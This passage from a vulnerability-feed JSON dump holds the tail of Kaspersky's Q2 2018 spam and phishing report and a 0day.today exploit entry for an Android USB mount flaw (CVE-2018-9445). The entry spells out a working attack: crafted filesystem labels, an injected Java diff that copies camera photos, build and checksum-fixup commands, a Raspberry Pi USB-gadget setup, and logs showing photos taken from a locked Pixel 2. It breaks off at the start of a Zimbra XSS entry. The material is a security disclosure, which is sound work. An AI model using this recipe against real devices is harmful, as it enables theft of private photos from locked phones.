Fortune](<http://fortune.com/the-ledger-40-under-40>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122541/180810-spam-report-q2-18-9.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122541/180810-spam-report-q2-18-9.png>)\n\n_An example of a website advertised on Elon Musk's fake account_\n\nNews sensations make these schemes even more effective. For instance, the shutdown of the Telegram messenger generated a wave of fake messages from \"Pavel Durov\" promising compensation. In this case cybercriminals use similarly-spelled account names. For example, if the original account name contains an underscore, cybercriminals register a new user with two underscores in the name and publish messages about cryptocurrency giveaways in comments to the celebrities' authentic Twitter posts. As a result, even a detail-oriented person may have a hard time spotting the fake.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122549/180810-spam-report-q2-18-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122549/180810-spam-report-q2-18-10.png>)\n\nTwitter administration promised to stop this type of fraud a long time ago. One of their first steps involved blocking accounts that tried to change the user's name to Elon Musk, and most probably other names commonly used by cybercriminals as well. However, it is easy to keep the account from being blocked by entering a Captcha and a code sent via text, after which the user can keep Elon's name or change it to anything they want\u2014 the account will not be blocked again. It is also unclear whether Twitter will block the obfuscated names of famous people that are often exploited by cybercriminals.\n\nAnother measure taken by the social network is blocking accounts that post links to Elon Musk's account. Just like in the previous example, the account can be unblocked by entering a Captcha and confirming a phone number via a code received in a text message.\n\nThis scam has started spreading to other platforms as well. Fake accounts can also be found on Instagram.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10124414/180810-spam-report-q2-18-10-5.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10124414/180810-spam-report-q2-18-10-5.jpg>)\n\n_Vitalik Buterin's fake Instagram account_\n\n### Facebook\n\nOn Facebook, in addition to the aforementioned content distribution through viral threads, cybercriminals often use the advertising mechanisms offered by the social network. We have recorded instances of get-rich-quick schemes being spread through Facebook ads.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122556/180810-spam-report-q2-18-11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122556/180810-spam-report-q2-18-11.png>)\n\n_Fraudulent website ad on Facebook_\n\nAfter clicking on the ad, the user is redirected to a website where, after completing a few steps, they are offered a reward. To receive this reward, the user must either pay a fee, enter their credit card information, or share some personal details. Of course, the user does not receive any reward in the end.\n\n### Search results\n\nAds with malicious content and links to phishing sites can be found not only on social networks, but also in the search results pages of major search engines. This has recently become a popular method of advertising fake ICO project websites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122602/180810-spam-report-q2-18-12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122602/180810-spam-report-q2-18-12.png>)\n\n_Users do not always notice the \"Ad\" label next to the ads_\n\n## Spammer tricks\n\nLast quarter, spammers tried to use the following new tricks to evade filters.\n\n### Double email headers\n\nWhen generating spam emails, spammers use two From fields in the email header. The first From field contained a legitimate address, usually one from a well-known organization (whose reputation is untarnished by spam scandals) while the second contained the actual spammer email address, which has nothing to do with the first one. Spammers were expecting the email to be treated as legitimate by filters, forgetting that modern anti-spam solutions rely not only on the technical part of the email, but also on its content.\n\n### Subscription forms\n\nIn these events, spam messages in the form of an automatic mailing list subscription confirmations arrive in recipient inboxes. Regular websites capable of unlimited user registration were employed to create them (especially when they allowed using the same email address multiple times). Spammers used a script that auto-filled subscription forms inserting recipient addresses from previously collected (or purchased) databases. Spam content was a short phrase with a link to a spam resource inserted into one of the mandatory fields in the form (in particular, the recipient name). As a result, the user received a notification sent from a legitimate mail address containing a spam link instead of their name.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122609/180810-spam-report-q2-18-13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122609/180810-spam-report-q2-18-13.png>)\n\n_An example of spam mail sent using the subscription service on a legal site_\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\nProportion of spam in global email traffic, Q1 and Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122615/180810-spam-report-q2-18-14.png>)\n\nIn the Q2 2018, the largest percentage of spam was recorded in May at 50.65%. The average percentage of spam in world mail traffic is 49.66%, which was 2.16 p.p. lower than the previous reporting period.\n\n### Sources of spam by country\n\nSpam -originating countries, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122622/180810-spam-report-q2-18-15.png>)\n\nThe leading spam-originating country in Q2 2018 was Vietnam (3.98%), which fell to seventh place in the second quarter, replaced by China (14.36%). The second and third places, the USA in Germany, are only one percentage point apart, with 12.11% and 11.12% shares, respectively. France occupied the fourth place (4.42%), and the fifth was occupied by Russia (4.34%). Great Britain occupied the tenth place (2.43%).\n\n### Spam email size\n\nSpam email size, Q1 and Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122628/180810-spam-report-q2-18-16.png>)\n\nThe results of the Q2 2018 indicate that the share of very small spam messages (up to 2 KB) fell 2.45 p.p. to 79.17%. The percentage of 5-10 KB spam messages, on the other hand, grew somewhat (by 1.45 p.p.) in comparison with the previous quarter and amounted to 5.56%.\n\nThe percentage of 10-20 KB spam messages was practically unchanged \u2014 it went down by 0.93 p.p. to 3.68%. 20-50 KB spam messages saw a similar trend, their share decreasing by 0.4 p.p. (to 2.68%) in comparison with the previous reporting period.\n\n### Malicious attachments: malware families\n\nTop 10 malware families, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122634/180810-spam-report-q2-18-17.png>)\n\nAccording to the results of the Q2 2018, the most widely-distributed family of malware by-mail was Exploit.Win32.CVE-2017-11882 (with 10.35%)/ This is the verdict attributed to various malware that exploited the CVE-2017-11882 vulnerability in Microsoft Word. The amount of mail with the Trojan-PSW.Win32.Fareit malware family in it, which steals user information and passwords, decreased during the second quarter, losing the first place and now occupying the second place (with 5.90%). The third and fourth places are occupied by Backdoor.Win32.Androm (5.71%) and Backdoor.Java.QRat (3.80%). The Worm.Win32.WBVB family was the fifth most popular malware with cybercriminals.\n\n### Countries targeted by malicious mailshots\n\nDistribution of Mail Anti-Virus triggers by country, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122641/180810-spam-report-q2-18-18.png>)\n\nThe first, second, and third places among the countries with the highest quantity of Mail Anti-Virus triggers in Q2 2018 were unchanged. Germany remained in the first place (9.54%), and the second and third places were taken by Russia and Great Britain (8.78% and 8.67%, respectively). The fourth and fifth places were taken by Brazil (7.07%) and Italy (5.39%).\n\n## Statistics: phishing\n\nIn the Q2 2018, the Antiphishing prevented **107,785,069** attempts to connect users to malicious websites. 9.6% of all Kaspersky Lab users around the world were subject to attack.\n\n### Geography of attacks\n\nThe country with the highest percentage of users attacked by phishing in Q2 2018 was again Brazil, with 15.51% (-3.56 p.p.).\n\nGeography of phishing attacks, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122648/180810-spam-report-q2-18-19.png>)\n\n**Country** | **%*** \n---|--- \nBrazil | 15.51 \nChina | 14.77 \nGeorgia | 14.44 \nKyrgyzstan | 13.60 \nRussia | 13.27 \nVenezuela | 13.26 \nMacao | 12.84 \nPortugal | 12.59 \nBelarus | 12.29 \nSouth Korea | 11.66 \n \n_* Percentage of users whose Antiphishing system triggered against all Kaspersky Lab users in the respective country._\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's heuristic Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._[/caption] \n\nIn Q2 2018, the Global Internet Portals category again took first place with 25.00% (+1.3 p.p.).\n\n_Distribution of organizations affected by phishing attacks by category, Q2 2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122656/180810-spam-report-q2-18-20.png>)\n\nThe percentage of attacks on organizations that may be combined into a general Finance category (banks, at 21.10%, online stores, at 8.17%, and payment systems, at 6.43%) fell to 35.70% (-8.22 p.p.). IT companies in the second quarter were more often subject to threats then in the first quarter. This category saw an increase of 12.28 p.p. to 13.83%.\n\n## Conclusion\n\nAverage spam volume of 49.66% in world mail traffic in this quarter fell 2.16 p.p. in comparison with the previous reporting period, and the Antiphishing system prevented more than 107M attempts to connect users to phishing sites, which is 17M more than in the first quarter of 2018.\n\nIn this quarter, malefactors actively used GDPR, World Cup, and cryptocurrency themes, and links to malicious websites could be found on social networks and messengers (users were often distributing them themselves), as well as in marketing messages served by large search engines.\n\nExploit.Win32.CVE-2017-11882 was the most widely-distributed family of malware via mail, at 10.35%. Trojan-PSW.Win32.Fareit fell from the first place to the second place (5.90%), and the third and fourth places were taken by Backdoor.Win32.Androm (5.71%) and Backdoor.Java.QRat (3.80%).", "reporter": "Maria Vergelis", "published": "2018-08-14T10:00:36", "type": "securelist", "title": "Spam and phishing in Q2 2018", "enchantments": {"score": {"modified": "2018-08-14T10:31:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-14T10:00:36", "id": "SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "href": "https://securelist.com/spam-and-phishing-in-q2-2018/87368/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-08-14T22:18:40", "references": [], "description": "Exploit for Android platform in category local exploits", "edition": 1, "reporter": "Google Security Research", "published": "2018-08-14T00:00:00", "title": "Android - Directory Traversal over USB via Injection in blkid Output Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-08-14T22:18:40", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9445"], "modified": "2018-08-14T00:00:00", "id": "1337DAY-ID-30885", "href": "https://0day.today/exploit/description/30885", "sourceData": "When a USB mass storage device is inserted into an Android phone (even if the\r\nphone is locked!), vold will attempt to automatically mount partitions from the\r\ninserted device. For this purpose, vold has to identify the partitions on the\r\nconnected device and collect some information about them, which is done in\r\nreadMetadata() in system/vold/Utils.cpp. This function calls out to \"blkid\",\r\nthen attempts to parse the results:\r\n \r\n \r\n std::vector<std::string> cmd;\r\n cmd.push_back(kBlkidPath);\r\n cmd.push_back(\"-c\");\r\n cmd.push_back(\"/dev/null\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"TYPE\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"UUID\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"LABEL\");\r\n cmd.push_back(path);\r\n \r\n std::vector<std::string> output;\r\n status_t res = ForkExecvp(cmd, output, untrusted ? sBlkidUntrustedContext : sBlkidContext);\r\n if (res != OK) {\r\n LOG(WARNING) << \"blkid failed to identify \" << path;\r\n return res;\r\n }\r\n \r\n char value[128];\r\n for (const auto& line : output) {\r\n // Extract values from blkid output, if defined\r\n const char* cline = line.c_str();\r\n const char* start = strstr(cline, \"TYPE=\");\r\n if (start != nullptr && sscanf(start + 5, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsType = value;\r\n }\r\n \r\n start = strstr(cline, \"UUID=\");\r\n if (start != nullptr && sscanf(start + 5, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsUuid = value;\r\n }\r\n \r\n start = strstr(cline, \"LABEL=\");\r\n if (start != nullptr && sscanf(start + 6, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsLabel = value;\r\n }\r\n }\r\n \r\n \r\nNormally, the UUID string can't contain any special characters because blkid\r\ngenerates it by reformatting a binary ID as a printable UUID string. However,\r\nthe version of blkid that Android is using will print the LABEL first, without\r\nescaping the characters this code scans for, allowing an attacker to place\r\nspecial characters in the fsUuid variable.\r\n \r\n \r\nFor example, if you format a USB stick with a single partition, then place a\r\nromfs filesystem in the partition as follows (on the terminal of a Linux PC):\r\n \r\n # echo '-rom1fs-########TYPE=\"vfat\" UUID=\"../../data\"' > /dev/sdc1\r\n \r\nand then connect the USB stick to a Nexus 5X and run blkid as root on the\r\ndevice, you'll see the injection:\r\n \r\n bullhead:/ # blkid -c /dev/null -s TYPE -s UUID -s LABEL /dev/block/sda1\r\n /dev/block/sda1: LABEL=\"TYPE=\"vfat\" UUID=\"../../data\"\" TYPE=\"romfs\"\r\n \r\n \r\nlogcat shows that the injection was successful and the device is indeed using\r\nthe injected values, but vold doesn't end up doing much with the fake UUID\r\nbecause fsck_msdos fails:\r\n \r\n05-29 20:41:26.262 391 398 V vold : /dev/block/vold/public:8,1: LABEL=\"TYPE=\"vfat\" UUID=\"../../data\"\" TYPE=\"romfs\" \r\n05-29 20:41:26.262 391 398 V vold : \r\n05-29 20:41:26.263 391 398 V vold : /system/bin/fsck_msdos\r\n05-29 20:41:26.263 391 398 V vold : -p\r\n05-29 20:41:26.263 391 398 V vold : -f\r\n05-29 20:41:26.263 391 398 V vold : /dev/block/vold/public:8,1\r\n05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {652 public:8,1 vfat}\r\n05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {653 public:8,1 ../../data}\r\n05-29 20:41:26.265 813 2039 D VoldConnector: RCV <- {654 public:8,1 TYPE=}\r\n05-29 20:41:26.281 391 398 I fsck_msdos: ** /dev/block/vold/public:8,1\r\n05-29 20:41:26.285 391 398 I fsck_msdos: Invalid sector size: 8995\r\n05-29 20:41:26.286 391 398 I fsck_msdos: fsck_msdos terminated by exit(8)\r\n05-29 20:41:26.286 391 398 E Vold : Filesystem check failed (no filesystem)\r\n05-29 20:41:26.286 391 398 E vold : public:8,1 failed filesystem check\r\n05-29 20:41:26.286 813 2039 D VoldConnector: RCV <- {651 public:8,1 6}\r\n05-29 20:41:26.287 813 2039 D VoldConnector: RCV <- {400 48 Command failed}\r\n05-29 20:41:26.288 2532 2532 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,1}:\r\n05-29 20:41:26.288 2532 2532 D StorageNotification: type=PUBLIC diskId=disk:8,0 partGuid=null mountFlags=0 mountUserId=0 \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: state=UNMOUNTABLE \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE= \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: path=null internalPath=null \r\n \r\n \r\nFor a relatively harmless example in which vold actually ends up mounting the\r\ndevice in the wrong place, you can create a vfat partition with label\r\n'UUID=\"../##':\r\n \r\n # mkfs.vfat -n 'PLACEHOLDER' /dev/sdc1\r\n mkfs.fat 4.1 (2017-01-24)\r\n # dd if=/dev/sdc1 bs=1M count=200 | sed 's|PLACEHOLDER|UUID=\"../##|g' | dd of=/dev/sdc1 bs=1M\r\n 200+0 records in\r\n 200+0 records out\r\n 209715200 bytes (210 MB, 200 MiB) copied, 1.28705 s, 163 MB/s\r\n 198+279 records in\r\n 198+279 records out\r\n 209715200 bytes (210 MB, 200 MiB) copied, 2.60181 s, 80.6 MB/s\r\n \r\nConnect it to the Android device again while running strace against vold:\r\n \r\n [pid 398] newfstatat(AT_FDCWD, \"/mnt/media_rw/../##\", 0x7d935fe708, AT_SYMLINK_NOFOLLOW) = -1 ENOENT (No such file or directory)\r\n [pid 398] mkdirat(AT_FDCWD, \"/mnt/media_rw/../##\", 0700) = 0\r\n [pid 398] fchmodat(AT_FDCWD, \"/mnt/media_rw/../##\", 0700) = 0\r\n [pid 398] fchownat(AT_FDCWD, \"/mnt/media_rw/../##\", 0, 0, 0) = 0\r\n [pid 398] mount(\"/dev/block/vold/public:8,1\", \"/mnt/media_rw/../##\", \"vfat\", MS_NOSUID|MS_NODEV|MS_NOEXEC|MS_DIRSYNC|MS_NOATIME, \"utf8,uid=1023,gid=1023,fmask=7,d\"...) = 0\r\n [pid 398] faccessat(AT_FDCWD, \"/mnt/media_rw/../##/LOST.DIR\", F_OK) = -1 ENOENT (No such file or directory)\r\n [pid 398] mkdirat(AT_FDCWD, \"/mnt/media_rw/../##/LOST.DIR\", 0755) = 0\r\n \r\nCheck the results:\r\n \r\n bullhead:/ # ls -l /mnt\r\n total 32\r\n drwxrwx--- 3 media_rw media_rw 32768 2018-05-29 20:54 ##\r\n drwx--x--x 2 root root 40 1970-01-01 04:14 appfuse\r\n drwxr-xr-x 2 root system 40 1970-01-01 04:14 asec\r\n drwxrwx--x 2 system system 40 1970-01-01 04:14 expand\r\n drwxr-x--- 2 root media_rw 40 1970-01-01 04:14 media_rw\r\n drwxr-xr-x 2 root system 40 1970-01-01 04:14 obb\r\n drwx------ 5 root root 100 1970-01-01 04:14 runtime\r\n lrwxrwxrwx 1 root root 21 1970-01-01 04:14 sdcard -> /storage/self/primary\r\n drwx------ 3 root root 60 1970-01-01 04:14 secure\r\n drwxr-xr-x 3 root root 60 1970-01-01 04:14 user\r\n bullhead:/ # mount | grep '##'\r\n /dev/block/vold/public:8,1 on /mnt/## type vfat (rw,dirsync,nosuid,nodev,noexec,noatime,uid=1023,gid=1023,fmask=0007,dmask=0007,allow_utime=0020,codepage=437,iocharset=iso8859-1,shortname=mixed,utf8,errors=remount-ro)\r\n \r\n \r\nWhen testing with a normal USB stick, the attacker has to choose between using a\r\nvfat filesystem (so that Android is capable of mounting it as external storage)\r\nand using a romfs filesystem (so that the label is long enough to specify\r\narbitrary paths). However, an attacker who wants to perform more harmful attacks\r\ncould use a malicious USB storage device that is capable of delivering different\r\ndata for multiple reads from the same location. This way, it would be possible\r\nto deliver a romfs superblock when blkfs is reading, but deliver a vfat\r\nsuperblock when the kernel is reading. I haven't tested this yet because I don't\r\nyet have the necessary hardware.\r\n \r\n \r\nWhen you fix this issue, please don't just fix the injection and/or the\r\ndirectory traversal. I believe that from a security perspective, a smartphone\r\nshould not mount storage devices that are inserted while the screen is locked\r\n(or, more generally, communication with new USB devices should be limited while\r\nthe screen is locked). Mounting a USB storage device exposes a lot of code to\r\nthe connected device, including partition table parsing, vold logic, blkid, the\r\nkernel's FAT filesystem implementation, and anything on the device that might\r\ndecide to read files from the connected storage device.\r\n \r\n \r\n############################################################\r\n \r\nThis is a PoC for stealing photos from the DCIM folder of a Pixel 2 running\r\nbuild OPM2.171026.006.C1 while the device is locked. You will need a Pixel 2 as\r\nvictim device, a corresponding AOSP build tree, a Raspberry Pi Zero W (or some\r\nother device you can use for device mode USB), a powered USB hub, and some\r\ncables.\r\n \r\nThe victim phone must be powered on, the disk encryption keys must be unlocked\r\n(meaning that you must have entered your PIN/passphrase at least once since\r\nboot), and the attack probably won't work if someone has recently (since the\r\nlast reboot) inserted a USB stick into the phone.\r\n \r\n \r\nConfigure the Raspberry Pi Zero W such that it is usable for gadget mode\r\n(see e.g. https://gist.github.com/gbaman/50b6cca61dd1c3f88f41).\r\n \r\nApply the following patch to frameworks/base in your AOSP build tree:\r\n \r\n=========================================\r\ndiff --git a/packages/ExternalStorageProvider./src/com/android/externalstorage/MountReceiver.java b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\nindex 8a6c7d68525..73be5818da1 100644\r\n--- a/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\n+++ b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\n@@ -20,10 +20,38 @@ import android.content.BroadcastReceiver;\r\n import android.content.ContentProviderClient;\r\n import android.content.Context;\r\n import android.content.Intent;\r\n+import java.io.File;\r\n+import java.io.FileInputStream;\r\n+import java.io.FileOutputStream;\r\n \r\n public class MountReceiver extends BroadcastReceiver {\r\n @Override\r\n public void onReceive(Context context, Intent intent) {\r\n+ System.logE(\"MOUNTRECEIVER CODE INJECTED, GRABBING FILES...\");\r\n+ try {\r\n+ File exfiltration_dir = new File(\"/data/exfiltrated-photos\");\r\n+ exfiltration_dir.mkdir();\r\n+ File camera_dir = new File(\"/storage/emulated/0/DCIM/Camera\");\r\n+ File[] camera_files = camera_dir.listFiles();\r\n+ for (File camera_file: camera_files) {\r\n+ System.logE(\"GRABBING '\"+camera_file.getName()+\"'\");\r\n+ File exfiltrated_file = new File(exfiltration_dir, camera_file.getName());\r\n+ exfiltrated_file.delete();\r\n+ FileInputStream ins = new FileInputStream(camera_file);\r\n+ FileOutputStream outs = new FileOutputStream(exfiltrated_file);\r\n+ byte[] buf = new byte[4096];\r\n+ int len;\r\n+ while ((len=ins.read(buf)) > 0) {\r\n+ outs.write(buf, 0, len);\r\n+ }\r\n+ ins.close();\r\n+ outs.close();\r\n+ }\r\n+ } catch (Exception e) {\r\n+ throw new RuntimeException(e);\r\n+ }\r\n+ System.logE(\"INJECTED CODE DONE\");\r\n+\r\n final ContentProviderClient client = context.getContentResolver()\r\n .acquireContentProviderClient(ExternalStorageProvider.AUTHORITY);\r\n try {\r\n=========================================\r\n \r\nThen build the tree (\"lunch aosp_walleye-userdebug\", then build with \"make\").\r\n \r\nZip the classes.dex build artifact of ExternalStorageProvider:\r\n \r\n$ zip -jX zipped_dexfile ~/aosp-walleye/out/target/common/obj/APPS/ExternalStorageProvider_intermediates/classes.dex\r\n adding: classes.dex (deflated 49%)\r\n$ mv zipped_dexfile.zip zipped_dexfile\r\n \r\nDownload the factory image for OPM2.171026.006.C1 and unpack its system partition, e.g. using commands roughly as follows:\r\n \r\n$ unzip image-walleye-opm2.171026.006.c1.zip\r\n$ ~/aosp-walleye/out/host/linux-x86/bin/simg2img system.img system.img.raw # convert sparse image to normal\r\n$ echo 'rdump / walleye-opm2.171026.006.c1/unpacked_system/' | debugfs -f- walleye-opm2.171026.006.c1/unpacked_image/system.img.raw 2>/dev/null # extract filesystem image\r\n \r\nNow build the classes.dex build artifact into an odex file and a vdex file, linking against boot.art from the factory image:\r\n \r\n$ ~/aosp-walleye/out/host/linux-x86/bin/dex2oat --runtime-arg -Xms64m --runtime-arg -Xmx512m --class-loader-context='&' --boot-image=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/framework/boot.art --dex-file=zipped_dexfile --dex-location=/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk --oat-file=package.odex --android-root=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system --instruction-set=arm64 --instruction-set-variant=cortex-a73 --instruction-set-features=default --runtime-arg -Xnorelocate --compile-pic --no-generate-debug-info --generate-build-id --abort-on-hard-verifier-error --force-determinism --no-inline-from=core-oj.jar --compiler-filter=quicken\r\n \r\nThe resulting vdex file would not be accepted by the phone because of a CRC32\r\nchecksum mismatch; to fix it up, compile the attached vdex_crc32_fixup.c and use\r\nit to overwrite the CRC32 checksum with the expected one from the factory image:\r\n \r\n$ ./vdex_crc32_fixup package.vdex ~/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk \r\noriginal crc32: d0473780\r\nnew crc32: 84c10ae9\r\nvdex patched\r\n \r\nPrepare two disk images, each with a MBR partition table and a single partition.\r\nTheir partition tables should be identical.\r\nIn the first image's partition, place a fake romfs filesystem that triggers the\r\nvold bug:\r\n \r\n# echo -e '-rom1fs-########TYPE=\"vfat\" UUID=\"../../data\"\\0' > /dev/sdd1\r\n \r\nFormat the second image's partition with FAT32, and create the following\r\ndirectory structure inside that filesystem (the \"[email\u00a0protected]\" entries are files, the\r\nrest are directories):\r\n \r\n\u251c\u2500\u2500 dalvik-cache\r\n\u2502 \u2514\u2500\u2500 arm64\r\n\u2502 \u251c\u2500\u2500 [email\u00a0protected]@boot.art\r\n\u2502 \u251c\u2500\u2500 [email\u00a0protected]@[email\u00a0protected]@classes.dex\r\n\u2502 \u2514\u2500\u2500 [email\u00a0protected]@[email\u00a0protected]@classes.vdex\r\n\u251c\u2500\u2500 LOST.DIR\r\n\u251c\u2500\u2500 misc\r\n\u2502 \u2514\u2500\u2500 profiles\r\n\u2502 \u2514\u2500\u2500 cur\r\n\u2502 \u2514\u2500\u2500 0\r\n\u2502 \u2514\u2500\u2500 com.android.externalstorage\r\n\u251c\u2500\u2500 user\r\n\u2502 \u2514\u2500\u2500 0\r\n\u2502 \u2514\u2500\u2500 com.android.externalstorage\r\n\u2502 \u2514\u2500\u2500 cache\r\n\u2514\u2500\u2500 user_de\r\n \u2514\u2500\u2500 0\r\n \u2514\u2500\u2500 com.android.externalstorage\r\n \u2514\u2500\u2500 code_cache\r\n \r\nThe three [email\u00a0protected] files should have the following contents:\r\n \r\n - [email\u00a0protected]@boot.art should be a copy of system/framework/arm64/boot.art\r\n from the system image.\r\n - [email\u00a0protected]@[email\u00a0protected]@classes.dex\r\n should be the generated package.odex.\r\n - [email\u00a0protected]@[email\u00a0protected]@classes.vdex\r\n should be the fixed-up package.vdex.\r\n \r\nCopy the two disk images to the Raspberry Pi Zero W; the fake romfs image should\r\nbe named \"disk_image_blkid\", the image with FAT32 should be named\r\n\"disk_image_mount\". On the Pi, build the fuse_intercept helper:\r\n \r\n$ gcc -Wall fuse_intercept.c `pkg-config fuse --cflags --libs` -o fuse_intercept\r\n \r\nThen create a directory \"mount\" and launch fuse_intercept.\r\n \r\nIn a second terminal, tell the Pi's kernel to present the contents of the mount\r\npoint as a mass storage device:\r\n \r\n[email\u00a0protected]:~ $ sudo modprobe dwc2\r\n[email\u00a0protected]:~ $ sudo modprobe g_mass_storage file=/home/pi/mount/wrapped_image stall=0\r\n \r\n \r\nTo run the attack, connect the Pi to the powered USB hub as a device. Then use\r\na USB-C OTG adapter (unless you have some fancy USB-C hub, I guess?) to connect\r\nthe powered hub to the locked phone, with the phone in USB host mode.\r\n \r\nAt this point, the phone should first mount the USB stick over\r\n/data, then immediately afterwards launch\r\ncom.android.externalstorage/.MountReceiver:\r\n \r\n06-05 21:58:20.988 656 665 I Vold : Filesystem check completed OK\r\n06-05 21:58:20.988 1115 1235 D VoldConnector: RCV <- {656 public:8,97 /mnt/media_rw/../../data}\r\n06-05 21:58:20.990 1115 1235 D VoldConnector: RCV <- {655 public:8,97 /mnt/media_rw/../../data}\r\n06-05 21:58:21.004 1115 1235 D VoldConnector: RCV <- {651 public:8,97 2}\r\n06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:33): avc: denied { write } for name=\"/\" dev=\"sdg1\" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0\r\n06-05 21:58:21.006 1115 1235 D VoldConnector: RCV <- {200 7 Command succeeded}\r\n06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:34): avc: denied { write } for name=\"/\" dev=\"sdg1\" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0\r\n06-05 21:58:21.008 1335 1335 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,97}:\r\n06-05 21:58:21.008 1335 1335 D StorageNotification: type=PUBLIC diskId=disk:8,96 partGuid=null mountFlags=0 mountUserId=0 \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: state=MOUNTED \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE= \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: path=/mnt/media_rw/../../data internalPath=/mnt/media_rw/../../data \r\n06-05 21:58:21.020 1115 1129 I ActivityManager: Start proc 4478:com.android.externalstorage/u0a35 for broadcast com.android.externalstorage/.MountReceiver\r\n \r\nMost processes can't access the vfat filesystem that is now mounted at /data\r\neither because they lack the necessary groups or because of some SELinux rule.\r\nBut com.android.externalstorage passes both checks and can read and write (but\r\nnot execute) files from the new /data. Bytecode is loaded from\r\n/data/dalvik-cache/arm64/[email\u00a0protected]@[email\u00a0protected]@classes.vdex\r\nand then interpreted, allowing the attacker to steal photos from the device\r\n(since com.android.externalstorage has access to /storage/emulated/0):\r\n \r\n06-05 21:58:21.248 4478 4478 I zygote64: The ClassLoaderContext is a special shared library.\r\n06-05 21:58:21.276 4478 4478 W zygote64: JIT profile information will not be recorded: profile file does not exits.\r\n06-05 21:58:21.278 4478 4478 W asset : failed to open idmap file /data/resource-cache/[email\u00a0protected]@[email\u00a0protected]@idmap\r\n06-05 21:58:21.326 4478 4478 D ExternalStorage: After updating volumes, found 3 active roots\r\n06-05 21:58:21.334 4478 4478 E System : MOUNTRECEIVER CODE INJECTED, GRABBING FILES...\r\n06-05 21:58:21.343 4478 4478 E System : GRABBING 'IMG_20180605_212044.jpg'\r\n06-05 21:58:21.419 4478 4478 E System : GRABBING 'IMG_20180605_215031.jpg'\r\n06-05 21:58:21.428 2218 2218 W SQLiteLog: (28) file renamed while open: /data/user/0/com.google.android.gms/databases/config.db\r\n06-05 21:58:21.465 4478 4478 E System : INJECTED CODE DONE\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45192.zip\n\n# 0day.today [2018-08-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30885"}, {"lastseen": "2018-08-12T02:14:50", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Dino Barlattani", "published": "2018-08-11T00:00:00", "title": "Zimbra 8.6.0_GA_1153 - Cross-Site Scripting Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-08-12T02:14:50", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": 